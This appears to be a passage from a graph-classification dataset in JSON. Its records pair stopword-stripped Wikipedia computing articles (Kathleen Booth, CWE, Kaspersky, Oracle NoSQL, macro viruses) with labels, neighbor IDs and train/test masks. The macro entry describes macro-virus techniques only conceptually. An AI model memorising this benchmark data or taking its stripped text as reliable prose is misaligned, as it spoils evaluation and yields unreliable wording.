    "text": "Kathleen_Booth:kathleen booth kathleen booth born 1922 wrote first assembly language designed assembler autocode first computer systems birkbeck college university london helped design three different machines including arc automatic relay calculator sec simple electronic computer ape x c. kathleen britten born stourbridge worcestershire england obtained bsc mathematics university london 1944 went get phd applied mathematics 1950 married colleague andrew donald booth 1950 two children kathleen booth worked birkbeck college 1946–62 travelled united states andrew booth research assistant 1947 visiting john von neumann princeton upon returning uk co-authored general considerations design purpose electronic digital computer describing modifications original arc redesign arc2 using von neumann architecture part contribution arc assembly language also built maintained arc components kathleen andrew booth team birkbeck considered smallest early british computer groups 1947 1953 produced three machines arc automatic relay computer sec simple electronic computer ape x c all-purpose electronic rayon computer mr. booth worked team built computers programmed considered remarkable achievement due size group limited funds disposal although ape x c eventually led hec series manufactured british tabulating machine company small scale birkbeck group place front rank british computer activity booth regularly published papers concerning work arc ape x c systems co-wrote automatic digital calculators 1953 illustrated 'planning coding programming style co-founded school computer science information systems 1957 birkbeck college along andrew booth j.c. jennings 1958 taught programming course 1958 booth wrote one first books describing program ape x c computers 1944 1946 junior scientific officer royal aircraft establishment farnborough 1946 1962 booth research scientist british rubber producer research association ten years 1952 1962 research fellow lecturer birbeck college university london later became research fellow lecturer associate professor university saskatchewan canada 1962 1972 lakehead university canada became professor mathematics 1972 1978 booth research neural networks led successful programs simulating ways animals recognise patterns characters husband resigned suddenly birkbeck college 1961 chair conferred husband despite massive contributions i.c.t type 1400 computer donated department numerical automation fact installed london school hygiene tropical medicine",
    "neighbors": [
      2374,
      6950,
      8262,
      6032,
      10672,
      3159,
      8057,
      987,
      477
    ],
    "mask": "Train"
  },
  {
    "node_id": 6421,
    "label": 7,
    "text": "Volunteer_computing:volunteer computing volunteer computing type distributed computing arrangement people so-called volunteers provide computing resources projects use resources distributed computing and/or storage thus computer owners users donate computing resources processing power storage one projects volunteers frequently members general public possession personal computers internet connection also organizations act volunteers provide computing resources projects context mostly science-related projects executed universities academia general first volunteer computing project great internet mersenne prime search started january 1996 followed 1997 distributed.net 1997 1998 several academic research projects developed java-based systems volunteer computing examples include bayanihan popcorn superweb charlotte term volunteer computing coined luis f. g. sarmenta developer bayanihan also appealing global efforts social responsibility corporate social responsibility reported harvard business review used responsible forum 1999 seti home folding home projects launched projects received considerable media coverage one attracted several hundred thousand volunteers 1998 2002 several companies formed business models involving volunteer computing examples include popular power porivo entropia united devices 2002 berkeley open infrastructure network computing boinc project founded university california berkeley space sciences laboratory funded national science foundation boinc provides complete middleware system volunteer computing including client client gui application runtime system server software software implementing project web site first project based boinc predictor home based scripps research institute began operation 2004 soon thereafter seti home climateprediction.net began using boinc number new boinc-based projects created next years including rosetta home einstein home aqua home 2007 ibm world community grid switched united devices platform boinc client software early volunteer computing projects consisted single program combined scientific computation distributed computing infrastructure monolithic architecture inflexible example difficult deploy new application versions recently volunteer computing moved middleware systems provide distributed computing infrastructure independent scientific computation examples include systems basic structure client program runs volunteer computer periodically contacts project-operated servers internet requesting jobs reporting results completed jobs pull model necessary many volunteer computers behind firewalls allow incoming connections system keeps track user credit numerical measure much work user computers done project volunteer computing systems must deal several issues involving volunteered computers heterogeneity churn tendency individual computers join leave network time sporadic availability need interfere performance regular use addition volunteer computing systems must deal problems related correctness one common approach problems replicated computing job performed least two computers results corresponding credit accepted agree sufficiently effects may may noticeable even noticeable volunteer might choose continue participating however increased power consumption remedied extent setting option limit percentage processor used client available client software although issues lack accountability trust participants researchers implementing projects volunteer computing crucially important especially projects limited funding",
    "neighbors": [
      8640,
      1185,
      4194,
      5956,
      1480,
      6856,
      1806,
      3282,
      915,
      11027,
      7318,
      2394,
      8029,
      3678
    ],
    "mask": "Test"
  },
  {
    "node_id": 6422,
    "label": 2,
    "text": "House_(operating_system):house operating system house acronym haskell user operating system environment experimental open source operating system written haskell written explore system programming functional programming language includes graphical user interface several demos network protocol stack provides basic support ethernet ipv4 arp dhcp icmp ping udp tftp tcp",
    "neighbors": [
      2179,
      3876,
      10851,
      8262,
      10924,
      7983,
      2996,
      11413,
      5402,
      5469,
      5437
    ],
    "mask": "Test"
  },
  {
    "node_id": 6423,
    "label": 4,
    "text": "Common_Weakness_Enumeration:common weakness enumeration common weakness enumeration cwe category system software weaknesses vulnerabilities sustained community project goals understanding flaws software creating automated tools used identify fix prevent flaws project sponsored national cybersecurity ffrdc owned mitre corporation support us-cert national cyber security division u.s. department homeland security version 3.2 cwe standard released january 2019 cwe 600 categories including classes buffer overflows path/directory tree traversal errors race conditions cross-site scripting hard-coded passwords insecure random numbers common weakness enumeration cwe compatibility program allows service product reviewed registered officially cwe-compatible cwe-effective program assists organizations selecting right software tools learning possible weaknesses possible impact order obtain cwe compatible status product service must meet 4 6 requirements shown 48 organizations january 2018 develop maintain products services achieved cwe compatible status researchers think ambiguities cwe avoided reduced",
    "neighbors": [
      6497,
      4198,
      8042,
      3021,
      11213,
      2878,
      4081,
      2709,
      5404,
      4062,
      575
    ],
    "mask": "Train"
  },
  {
    "node_id": 6424,
    "label": 1,
    "text": "Database_dump:database dump database dump also sql dump contains record table structure and/or data database usually form list sql statements database dump often used backing database contents restored event data loss corrupted databases often recovered analysis dump database dumps often published free software free content projects allow reuse forking database",
    "neighbors": [
      10340,
      3366,
      4041,
      3692,
      5964,
      10413,
      10737,
      2901,
      7189,
      8539,
      2686
    ],
    "mask": "None"
  },
  {
    "node_id": 6425,
    "label": 4,
    "text": "Meredith_Gardner:meredith gardner meredith knox gardner october 20 1912 – august 9 2002 american linguist codebreaker gardner worked counter-intelligence decoding soviet intelligence traffic regarding espionage united states came known venona project gardner born okolona mississippi grew austin texas graduating university texas austin earned master degree german university wisconsin–madison teaching assistant 1938 1940 linguist professor german university akron united states army signals intelligence service recruited work breaking german codes soon started working japanese codes instead mastering japanese language months 1946 gardner began work highly secret project later codenamed venona break soviet cryptosystems soviet encryption system involved use one-time pads thus thought unbreakable however soviets made mistake reusing certain pages pads later year gardner made first breakthrough venona identifying ciphers used spelling english words may 1947 gardner read decrypt implied soviets ran agent access sensitive information war department general staff u.s. army air corps major william ludwig ullmann became apparent gardner reading kgb messages showing massive soviet espionage united states 1949 meredith gardner made big breakthrough able decipher enough soviet message identify text 1945 telegram winston churchill harry s. truman checking message complete copy telegram provided british embassy cryptanalysts confirmed beyond doubt war soviets spy access secret communication president united states prime minister britain peter wright met meredith gardner london arrests atom spies quiet scholarly man entirely unaware awe held cryptanalysts used tell worked matches office young pipe-smoking englishman named philby used regularly visit peer shoulder admire progress making gardner rather sad figure late 1960s felt keenly cryptanalytical break made possible thing mathematical beauty depressed use put wright revealed gardner upset research resulted mccarthyism executions julius rosenberg ethel rosenberg wright quotes gardner saying never wanted get anyone trouble wright added gardner appalled fact discovery led almost inevitably electric chair felt rosenbergs guilty ought given clemency gardner mind venona almost art form want sullied crude mccarthyism gardner retired 1972 yet work remained mostly secret 1996 nsa cia center democracy honored gardner colleagues formal ceremony result campaigning u.s senator daniel patrick moynihan gardner died august 9 2002 chevy chase maryland age 89",
    "neighbors": [
      1941,
      7887
    ],
    "mask": "Test"
  },
  {
    "node_id": 6426,
    "label": 3,
    "text": "Phantasie_III:phantasie iii phantasie iii third video game phantasie series final installment phantasie trilogy based around fighting evil nikademus finishing good released 1987 time nikademus attempting take entire world party stop phantasie iii maintained style original two improved upon graphics platforms except dos version combat engine also saw upgrades adding specific wound locations characters able head torso limb specifically injured broken removed also possible tactical battle line-up ability move characters front middle rear party game also improved upon spell list added larger variety weapons equipment game also two possible endings depending whether characters chose fight nikademus join phantasie iii sold 46,113 copies scorpia pleased improving trading interface combat grand ending game trilogy called game far weakest series criticized short length phantasie iii reviewed 1988 dragon 130 hartley patricia kirk lesser role computers column reviewers gave game 4 5 stars phantasie phantasie iii questron ii later re-released together reviewed 1994 dragon 203 sandy petersen eye monitor column petersen gave compilation 2 5 stars",
    "neighbors": [
      8062,
      6030
    ],
    "mask": "Test"
  },
  {
    "node_id": 6427,
    "label": 9,
    "text": "Java_Virtual_Machine_Tools_Interface:java virtual machine tools interface java virtual machine tool interface jvmti properly jvm ti introduced j2se 5.0 tiger interface allows program inspect state control execution applications running java virtual machine jvm jvmti designed provide application programming interface api development tools need access state jvm examples tools debuggers profilers jvmti native interface jvm library written c c++ loaded initialization jvm library access jvm state calling jvmti jni java native interface functions register receive jvmti events using event handler functions called jvm event occurs jvmti defined java community process jsr-163 specification java platform profiling architecture jvmti replaces jvmpi java virtual machine profiling interface jvmdi java virtual machine debug interface jvmpi jvmdi declared deprecated j2se 5.0 removed java se6 jvmti lowest level java platform debugger architecture",
    "neighbors": [
      4960,
      3562,
      2045
    ],
    "mask": "Test"
  },
  {
    "node_id": 6428,
    "label": 9,
    "text": "JSR_53:jsr 53 jsr 53 java specification request developed java community process specifies java servlet 2.3 specification javaserver pages 1.2 specification",
    "neighbors": [
      4960
    ],
    "mask": "Test"
  },
  {
    "node_id": 6429,
    "label": 8,
    "text": "Timable:timable timable online event listing platform hong kong consisting websites mobile apps co-founded sam yuen mike ko 2010 covers events happening town ranging concerts dramas exhibitions festivals events family etc timable original word means able time according explanation website letter e omitted word based common english grammar like scalable writable timable represents vision platform – search time users search events matching spare time however name often mistaken timeable timetable moment corresponding chinese name timable contents contributed event organizers web 2.0 approach published timable editors end 2013 23,000 events recorded",
    "neighbors": [
      7802,
      9732,
      735
    ],
    "mask": "Test"
  },
  {
    "node_id": 6430,
    "label": 4,
    "text": "Macro_and_security:macro security macro computer science rule pattern specifies certain input sequence often sequence characters mapped replacement input sequence also often sequence characters according defined procedure macro used define variables procedures allow code reuse design domain-specific languages macros separated several types macros useful software users simplify regularly used actions repetitive code programmer sequence actions program productivity user increased however many problems exist tackled subsequently dangers text substitution macros like c macros c preprocessor powerful tool bring clarity code contrary obscure first n't form macros error checking c assembly language possible make macros work.indeed c language syntax macro replaced declared preprocessor compiler check code example //file example.c int main example compiles macro somestring n't used macro used would compilation error //file example.c int main gcc -o example example.c example.c function 'main example.c:6:26 erreur 'foo undeclared first use function example.c:6:26 note undeclared identifier reported function appears simple example applications count code lines begins huge really important macro n't compile may change syntax previous example quotation marks added foo others whole syntax false may change macro calls case type flaw minimal affect maintenance application second point 'll see repetitive code found macros lead wasted computing time let illustrate following code // file example2.c int main int whatmax int getnumber call macro called max 2 values variable foo return value function getnumber basic macro calling function calculate maximum 2 values code executed obtain ./example2 called max 5 moment nothing wrong let replace value getnumber 6 example result ./example2 called called max 6 function getnumber called two times yet need call one time macro replace call macro max syntax return whatmax return foo getnumber foo getnumber value getnumber greater value foo called two times one comparison one return see slow execution program function example need take time calculate return value last point section see macros potentially dangerous programs critical data operations needed order make operations legible macros used double-edged.let take example code execution // file example3.c define cube x x*x*x int main ./example3 10 z 18 normally result expected equal 64 z 30 preprocessor replace calls macros obtain // x 1*x 1*x 1 // equivalent x 1 x 1 x 1 // 3 1 3 1 3 1 // equal 10 // z 5 x+x // equivalent 5 x x // 18 macros c others languages like smx sam76 assembly language etc text substitution n't anything responsibility programmer careful case put parentheses others cases effects instantly predicted like one // file example4.c int main 8 expected value result execution ./example4 10 let see happens decompose execution stack ++x ++x stack first '+ unstacked first '++x evaluated unstacked x 4 second '++x'is evaluated unstacked x 5 '+ give x+x 5+5 10*/ result logical look execution stack obvious instinctively users macros careful without attention errors easily appear addition instructions like '++x imbricated instructions recommended either flaws completely different previous ones main problem vba-type macros viruses macro viruses relatively recent first one named concept created june 1995 main reason high-level languages used write macro code powerful easy use considerably increasing pool potential virus writers documents containing macros disseminated rapidly widely e-mail spread quickly destructive system macro means macros interact basic operators word document like often-used functionalities like filesave filesaveas macros strength weakness word document types macros redefinied users allow great flexibility user flaw hackers exploit take control document computer word document opened type viruses use automatic semi-automatic macros launched action events without user ’ knowledge consent example word document following macros autoexec autonew autoclose autoopen autoexit easy hacker replace basic functionalities macro virus name original functionality also combination shortcut keys associated system command like ctrl+b set bold font user change replacing customs macros hacker modify create macros user activate using shortcut key macros also activated macro button like button click information seems common safely type macro virus cut paste text document macro macro could invoked auto-open macro text would re-created document empty opened user notice document empty macro could also convert parts text order less noticeable removing macros document manually using anti-virus program would lead loss content document polymorphic viruses change code fundamental ways replication order avoid detection anti-virus scanners wordbasic first name language visual basic polymorphic viruses difficult indeed macro polymorphism relies encryption document however hackers control encryption key furthermore encryption n't really efficient encrypted macros document encryption key polymorphic macro replicates key n't change replication affects macro encryption addition difficulties macro ca n't modify another macro wordbasic really powerful language allows operations macros order implement macros viruses change contents hackers another macro fulfill task modify content virus however type macros viruses n't really widespread indeed hackers choose macros viruses easy quick implement make polymorphic macro need lot knowledge language wordbasic needs advanced functionalities time classic macro virus even hacker make polymorphic macro polymorphism needs done document needs update update visible user replication macro create do-nothing macros idea combined polymorphic macros macros necessarily do-nothing macro invokes next one arranged chain case removed disinfection destructive payload activated attack crash winword processor internal error since winword 6.0 number macros per template limited 150 attack limited still annoying macro viruses cases interact two viruses executed time modify source code results new virus ca n't recognize anti-viruses software result totally random macro virus infectious less infectious depends part virus changed however 'mating unintentional macro virus result chances less infectious indeed order replicate know commands source code changed random scheme macro ca n't replicate nevertheless possible macros intentionally different polymorphic macros viruses use another macro change contents order increase infectivity two viruses example article macro virus colors infected document another infected user system macro virus concept viruses use command autoopen first macro virus colors detected command autoopen command macro virus concept moreover concept duplicate unencrypted command virus colors encrypted colors encrypt commands replicate macro virus concept result hybridation macro virus infected user system first colors hybrid could replicate autoopen n't executed indeed command comes concept body hybrid colors create conflicts example shows potential mating macro viruses couple mating macro viruses created make difficult detect macro virus hypothesis two mate virus-specificscanners may reinforce virility viruses fortunately type macro virus rare polymorphic macro viruses may exist one indeed create two interact reduce virlity rather reinforce complicated one worst scenarios world viruses would tool allowing create new virus modifying existing one executable files hard create kind tool simple macro viruses since sources macros always available based idea polymorphic macros macro perform modifications macros present document considering modifications make macro order convert macro virus mutator quite easy create macro virus generators possible create quickly several thousands known viruses macros viruses stand-alone ’ depend macros infectious part virus replication viruses macros viruses called parasitic macros launched check macros viruses append contents way macros became viruses type macro ’ spread quickly stand-alone macros indeed depends macros without virus ’ spread parasitic macros often hybrid stand alone infect macros kind macro virus poses real problems virus-specific anti-virus fact change content viruses accurate detection n't possible different types anti-virus scanner one heuristic analysis anti-virus interpretes emulates macros indeed examine branches macros require np-complete complexity using backtracking case analysis one document contains macros would take much time interpreting emulating macro would lead either false positives errors macro viruses detected another type anti-virus integrety checker anti-virus cases n't work checks documents extensions dot doc indeed anti-virus producers suggest users word documents reside others extensions two content document tends change often like heuristic analysis lead false positives errors due fact type anti-virus checks whole document last type anti-virus seen virus-specific scanner searches signature viruses type anti-virus weakest previous ones indeed viruses detected virus-specific scanners ones knew producers software updates needed others types scanners moreover type anti-virus really weak morphing viruses cf.section macro virus change content signature detected virus-specific scanners even virus actions signature n't match one declare virus scanner additional responsibility anti-virus responsibility users potential macro virus detected user choose ignore quarantine destroy last option dangerous anti-virus activate destructives macro viruses destroy data deleted anti virus virus scanners users responsible security integrity documents/computer furthermore even anti-virus n't optimal virus detection macro viruses detected progression virus detection improve creation new macro viruses text-substitutions macros separated compiler like c securised integrated compiler limit utilisation marco solution allowing macros advantage improving productivity programmer particular multi-languages applications indeed independent language requirement compiler target language produce descriptive error messages location cause errors marco also needs module plug-in understand language plug-in must contain three oracles one check syntactic well-formedness one determine fragment free names last one test whether fragment captures given name moment prototype support c++ sql marco proves safe code using macros well-encapsulated language-scalable time example macro language allowing type-safe macros macroml expressive typed language supports generative macros macros translated target language metaml gives well-type program without runtime errors always faults world viruses fortunately lot macro viruses countered good anti-virus section presents characteristics anti-virus protect macro-viruses first specific anti-virus products really affect kind virus anti-virus analyzing content efficient also something notice modification process relatively slow noticeable user order protect macros viruses scanner detect elements chain remove properly anti-virus detect macros virus also remnants example colors anti-virus must detect microsoft scanprot macro virus protection tool contains remnants virus problem scanprot contain parts virus another problem virus b created modifying macros virus consists set macros virus b could detected remnant anti-virus would identify remove non-modified macros cases replication virus contain original macros could successful fact anti-virus would created new virus anti-virus updated easily fast counter viruses lot informations added every day performance anti-virus must drop updates problem easily identifiable set macros anti-virus parse body macro identify cut parts added macro viruses fortunately task difficult achieve",
    "neighbors": [
      11299,
      2213,
      7851,
      4684,
      3629,
      10413,
      847,
      655,
      9364,
      1244,
      477
    ],
    "mask": "None"
  },
  {
    "node_id": 6431,
    "label": 4,
    "text": "Kaspersky_Internet_Security:kaspersky internet security kaspersky internet security often abbreviated kis internet security suite developed kaspersky lab compatible microsoft windows mac os x. kis offers protection malware well email spam phishing hacking attempts data leaks kaspersky lab diagnostics results distributed relevant developers version 6.0 first release kis pc world magazine praised version 6.0 detection malware kis detected 100 percent threats subset january 2006 wild-list list prevalent threats suite detected almost 100 99.57 percent adware samples kis ability scan within compressed packed files detecting 83.3 percent hidden malware however version 6.0 criticized completely removing malware leaving registry entries files pc world also highlighted suite false positives — eight 20,000 clean files incorrectly flagged malicious — noticeable impact computer performance however data cached scan making subsequent scan faster firewall blocked attacks inside outside computer tested magazine found graphical user interface awkward navigate features parental controls instant messaging protection found competing suites symantec mcafee part version 6.0 cnet pc world criticized suite relatively high retail price us 79.95 kis 6.0 supports windows 98 se nt workstation 4.0 2000 professional xp home edition xp professional xp professional x64 vista 50 megabytes free space internet explorer 5.5 windows installer 2.0 required ram cpu requirements dependent operating system version 7.0 introduced redesigned gui components renamed reorganized anti-hacker module renamed firewall anti-spy module integrated privacy control module pc world described new interface intuitive great-looking parental controls introduced specific settings different age categories child parent within age categories content categories drugs violence users manually configure profiles filtering profiles associated users since content filtered network level feature work internet browser filter relies database known urls analyse websites real-time attempts access forbidden urls logged sites visited tracked well raising privacy issues limits internet access may set based time chat rooms along webmail sites manually blocked spam filtering integrates microsoft outlook outlook express windows mail bat e-mail content analysed scored e-mail scores two specified thresholds either marked spam probably spam mail dispatcher feature shows subject sender information messages allows users avoid downloading blatant spam selecting messages download filter self-trains analyzing incoming outgoing e-mail marked spam analyzing folders containing spam valid e-mail senders verified valid e-mail whitelisted e-mail also whitelisted blacklisted based phrases present text e-mail non-ascii characters invisible text also blocked however version 7.0 relatively poor showing misidentifying 30 percent valid messages pc magazine testing 30 percent spam also made inbox protection data leaks incorporated release suite warns users programs attempt access send data certain areas internet explorer stores webform information malware protection mostly positive detection disinfection tests av-test.org version 7.0 detected 100 percent wildlist threats using one-month-old signatures set new malware however detection fell 14 percent files scanned 5.24 megabytes per second version 7.0 successfully identified six actively running rootkits four six inactive rootkits able remove two six rootkits firewall correctly blocked attempted outside connections reasonable level security left default settings version drops support windows 98 2000 nt windows xp service pack 2 required except case xp professional x64 edition vista supported well ram cpu requirements dependent operating system 75 megabytes free space internet explorer 5.5 windows installer 2.0 version introduces revised user interface application filtering module updated anti-virus engine vulnerability scanner main window separates settings four categories compared eight predecessor status bar changes colour green yellow red reflect overall program status flashes divert attention needed pc magazine also noted pop-up notifications kept minimum kaspersky claims core anti-virus engine revised increase scan speed pc magazine found initial scan took two hours however subsequent scans took two minutes complete however malware detection relatively low comparison anti-virus applications tested 650 thousand samples version 8.0 detected 95.6 percent top score around 99 percent using two-week-old signatures version 8.0 detected 52 percent viruses different set samples kaspersky also blocked 60 percent malware based solely behaviour top performers scored 55.3 percent 80 percent respectively version 2009 detected 98.1 percent adware however pc world noted achieve kind performance users modify program settings default settings kis allowed zango install block installation users must enable kis scan malware security analyzer looks operating system program patches also looks vulnerable system settings presenting users list recommended actions prevent malware gaining access system however pc world criticized amount computer jargon used lack information adjust settings appropriately hand pc magazine found feature straightforward often solution involved downloading installing update kis uses whitelist carbon black classify trusted malicious programs malicious programs allowed run unknown programs falling two categories restricted actions perform firewall blocked attacks pc magazine testing phishing protection introduced release testing pc magazine found feature blocked 44 percent phishing urls internet explorer 7 blocked 67 percent urls mozilla firefox blocked 81 percent spam filtering integrates mozilla thunderbird scans nntp traffic spam automatically diverted folder using unsupported e-mail client download pop3 imap nntp mail kaspersky still generate report messages however unsupported client toolbar program classify messages spam client version 2010 kaspersky internet security introduced overhauled user interface sandbox running applications virtualized environment 9.0.0.736 build kis 2010 fully supported windows 7 operating system beta version released windows users 8 june 2010 version included new interface well gadget available windows vista windows 7 users pc mag rated version good 4/5 stars firewall noted good made adequate malware detection rates two critical fixes released kaspersky lab making current version 11.0.2.556 1 march 2011 kaspersky released first build version 2012 came beta version english french russian version versions due later 7 june 2011 kaspersky lab announced commercial release kaspersky internet security 2012 france germany switzerland current version 12.0.0.374 beta version released windows users 3 march 2012 version includes interface looks currently least much like internet security 2012 safe run option proactive defense instead behavioural monitoring system watcher seems taking greater responsibility detecting malware safe banking feature added release candidate build 13.0.1.4088 rc released windows users 20 july 2012 final version released 28 august 2012 build 13.0.1.4190 beta testing started 12 march 2013 version introduced windows 8 like gui design final version released 3 august 2013 build 14.0.0.4651 india russia august 13 usa august 27 uk 2014 release frequently characterized inferior user expectations largely due removal range granular fine-tuning options 2013 earlier used experienced users number added back 2015 beta time technical release build 463 february 13 2014 build 14.0.0.4651 e released build 14.0.0.4651 latest current version april 2014 beta version 2015 product build 463 released followed technical release preview near-complete 2015 product first official release product bangladesh june 2014 march 2015 bloomberg accused kaspersky close ties russian military intelligence officials kaspersky slammed claims blog calling coverage sensationalist guilty exploiting paranoia increase readership result alleged russian involvement 2016 presidential election ongoing investigations department homeland security officially banned use kaspersky internet security united states federal government september 2017 december 12 2017 use kaspersky software banned use american federal government law",
    "neighbors": [
      2049,
      2563,
      1052,
      2084,
      550,
      10790,
      2601,
      6699,
      8753,
      569,
      5178,
      9279,
      9791,
      10308,
      2118,
      4174,
      2654,
      8816,
      4722,
      10872,
      8315,
      9341,
      127,
      7809,
      131,
      6797,
      3218,
      10898,
      1172,
      11418,
      156,
      2721,
      2213,
      6823,
      3243,
      1708,
      3250,
      6834,
      5305,
      704,
      10433,
      7362,
      202,
      4814,
      9423,
      10451,
      1242,
      6364,
      5860,
      9448,
      10987,
      8943,
      1776,
      9971,
      1273,
      9983,
      1792,
      4374,
      9496,
      10531,
      5924,
      1318,
      8998,
      297,
      2859,
      3885,
      7983,
      4403,
      823,
      11577,
      9537,
      1858,
      11073,
      4421,
      1355,
      10574,
      2383,
      9048,
      4953,
      2907,
      4956,
      7515,
      9053,
      9055,
      9569,
      3941,
      3942,
      11622,
      4972,
      877,
      4464,
      3955,
      4480,
      1417,
      6028,
      3482,
      1436,
      4511,
      2976,
      8614,
      8615,
      10166,
      5057,
      5069,
      7121,
      467,
      10708,
      2005,
      4568,
      11225,
      8668,
      9713,
      6643
    ],
    "mask": "Test"
  },
  {
    "node_id": 6432,
    "label": 5,
    "text": "SC-FDE:sc-fde single-carrier frequency domain equalization sc-fde single-carrier sc modulation combined frequency-domain equalization fde alternative approach inter symbol interference isi mitigation",
    "neighbors": [],
    "mask": "Validation"
  },
  {
    "node_id": 6433,
    "label": 1,
    "text": "Oracle_NoSQL_Database:oracle nosql database oracle nosql database ond nosql-type distributed key-value database oracle corporation provides transactional semantics data manipulation horizontal scalability simple administration monitoring oracle released oracle autonomous nosql database cloud oandc august 10 2018 oandc managed cloud service applications require low latency flexible data models elastic scaling dynamic workloads oracle bought company developed berkeley db sleepycat software developers focus application development data store requirements rather managing back-end servers storage expansion cluster deployments topology software installation/patches/upgrades backup operating systems availability oandc scales meet dynamic application workloads throughput requirements users create tables store application data perform database operations oandc table similar relational table additional properties including provisioned write units read units storage capacity users provision throughput storage capacity table based anticipated workloads oandc resources allocated scaled accordingly meet workload requirements users billed hourly based capacity provisioned oandc provides simple data model row identified unique key value arbitrary length interpreted application application manipulate insert delete update read single row transaction application also perform iterative non-transactional scan rows database oracle corporation distributes ond two editions ond licensed using freemium model open-source versions oracle nosql community edition available end-users purchase additional features support via oracle store integrating oracle products oracle enterprise manager oracle coherence oracle nosql enterprise edition purchased ond drivers licensed pursuant apache 2.0 license used community enterprise editions ond built upon oracle berkeley db java edition high-availability storage engine adds services provide distributed highly available key/value store suited large-volume latency-sensitive applications ond client-server sharded shared-nothing system data shard replicated nodes comprise shard provides simple key-value paradigm application developer major key record hashed identify shard record belongs ond designed support changing number shards dynamically response availability additional hardware number shards changes key-value pairs redistributed across new set shards dynamically without requiring system shutdown restart shard made single electable master node serve read write requests several replicas usually two serve read requests replicas kept date using streaming replication change master node committed locally disk also propagated replicas ond provides single-master multi-replica database replication transactional data delivered replica nodes flexible durability policies per transaction event master replica node fails consensus-based paxos-based automated fail-over election process minimizes downtime soon failed node repaired rejoins shard updated becomes available processing read requests thus ond applications tolerate failures nodes within shard also multiple failures nodes distinct shards proper placement masters replicas server hardware racks interconnect switches ond intended increase availability commodity servers ond driver partitions data real time evenly distributes across storage nodes network topology latency-aware routing read write operations appropriate storage node order optimize load distribution performance ond administration service accessed web console command-line interface service supports functionality ability configure start stop monitor storage node without requiring configuration files shell scripts explicit database operations allows java management extensions jmx simple network management protocol snmp agents available monitoring allows management clients poll information status performance metrics operational parameters storage node managed services elasticity refers dynamic online expansion deployed cluster adding storage nodes increases capacity performance reliability ond includes topology planning feature administrator modify configuration nosql database database online administrator administrators move replication nodes and/or partitions over-utilized nodes onto underutilized storage nodes vice versa ond supports multiple zones intelligently allocate replication processes data order improve reliability hardware network power-related failure modes two types zones primary zones contain nodes serve masters replicas typically connected fast interconnects secondary zones contain nodes serve replicas secondary zones used provide low latency read access data distant location offload read-only workloads analytics report generation data exchange improved workload management ond supports avro data serialization provides compact schema-based binary data format schemas defined using json ond supports schema evolution configurable smart topology system administrators indicate much capacity available given storage node allowing capable nodes host multiple replication nodes system knows capacity storage nodes configuration automatically allocates replication nodes intelligently intended better load balancing better use system resources minimizing system impact event storage node failure smart topology supports data centers ensuring full set replicas initially allocated data center ond provides facilities perform rolling upgrade allowing system administrator upgrade cluster nodes database remains available ond configurable either c/p a/p cap particular writes configured performed synchronously replicas c/p cap i.e partition node failure causes system unavailable writes replication performed asynchronously reads configured served replica a/p cap i.e system always available guarantee consistency release 3.0 introduced tabular data structure simplifies application data modeling leveraging existing schema design concepts table model layered top distributed key-value structure inheriting advantages simplifying application design enabling seamless integration familiar sql-based applications primary key based indexing limits number low latency access paths sometimes applications need non-primary-key based paths support specific application requirements ond supports secondary index value field ond ee stream based apis allow reading writing large objects lobs audio video files without materialize entire file memory intended decrease latency operations across mixed workloads objects varying sizes ond provides acid compliant transactions full create read update delete crud operations adjustable durability consistency transaction guarantees sequence operations operate single atomic unit long affected records share major key path ond includes support java c python c rest apis allow application developer perform crud operations libraries include avro support developers serialize key-value records de-serialize key-value records interchangeably c java applications ond supports oracle rest data services ords allows customers build rest-based application access data either oracle database ond supports spatial queries rfc7946 compliant geojson data spatial functions indexing geojson data supported kvavroinputformat kvinputformat classes available read data ond natively hadoop mapreduce jobs one use class read nosql database records oracle loader hadoop oracle big data sql common sql access layer data stored hadoop hdfs hive ond allows customers query oracle nosql data hive oracle database users run mapreduce jobs data stored ond configured secure access latest release also supports primitive complex data types ond ee supports external table allows fetching oracle nosql data oracle database using sql statements select select count etc nosql data exposed external tables one access data via standard jdbc drivers and/or visualize enterprise business intelligence tools oracle event processing oep provides read access ond via nosql database cartridge cartridge configured cql queries used oracle semantic graph includes jena adapter oracle nosql database store large volumes rdf data triplets/quadruplets adapter enables fast access graph data stored ond via sparql queries integration oracle coherence allows ond used cache oracle coherence applications allowing applications directly access cached data ond ond ee supports os-independent cluster-wide password-based user authentication oracle wallet integration enables greater protection unauthorized access sensitive data additionally session-level secure sockets layer ssl encryption network port restrictions improve protection network intrusion ond version 4.0 – new features ond team worked several key oracle partners including intel cisco performing yahoo cloud serving benchmarks ycsb various hardware configurations published results example 2012 oracle reported ond exceeded 1 million mixed ycsb ops/sec",
    "neighbors": [
      11136,
      9867,
      19,
      1049,
      11161,
      5677,
      6834,
      6067,
      9782,
      1594,
      3133,
      10048,
      10565,
      7499,
      11343,
      4817,
      3927,
      10340,
      6629,
      8554,
      1142,
      2045
    ],
    "mask": "None"
  },
  {
    "node_id": 6434,
    "label": 6,
    "text": "Extent_(file_systems):extent file systems extent contiguous area storage reserved file file system represented range block numbers tracks count key data devices file consist zero extents one file fragment requires one extent direct benefit storing range compactly two numbers instead canonically storing every block number range also extent allocation results less file fragmentation extent-based file systems also eliminate metadata overhead large files would traditionally taken block-allocation tree savings small compared amount stored data file sizes general make large portion metadata large files overall benefits storage efficiency performance slight order resist fragmentation several extent-based file systems allocate-on-flush many modern fault-tolerant file systems also copy-on-write although increases fragmentation similar design cp/m file system uses extents well correspond definition given cp/m extents appear contiguously single block combined directory/allocation table necessarily correspond contiguous data area disk ibm os/360 successors allocates files multiples disk tracks cylinders files could originally 16 extents restriction since lifted initial allocation size size additional extents allocated required specified user via job control language system attempts allocate initial size contiguous area although may split contiguous space available systems supporting filesystem extents include following",
    "neighbors": [
      5120,
      2564,
      6669,
      3598,
      10257,
      9236,
      6677,
      5142,
      8214,
      3611,
      9249,
      9762,
      5158,
      3640,
      7225,
      11323,
      8772,
      1109,
      4708,
      10340,
      8298,
      9836,
      7789,
      9333,
      6263,
      9335,
      2687,
      9343,
      5256,
      7818,
      654,
      10382,
      2193,
      2194,
      2197,
      2199,
      11419,
      6309,
      1190,
      5286,
      10405,
      5293,
      7344,
      2230,
      5816,
      1212,
      8380,
      3265,
      10951,
      9420,
      10958,
      8911,
      7378,
      3795,
      4819,
      8402,
      8404,
      728,
      8410,
      6365,
      739,
      7907,
      8938,
      1263,
      3312,
      3826,
      2291,
      246,
      3834,
      1278,
      3328,
      11012,
      5384,
      2314,
      8461,
      6416,
      1810,
      11030,
      6935,
      11033,
      287,
      1825,
      5413,
      3368,
      4907,
      9004,
      302,
      6961,
      6963,
      1844,
      823,
      4409,
      6970,
      11072,
      10051,
      3909,
      2378,
      4431,
      5969,
      346,
      2395,
      2397,
      868,
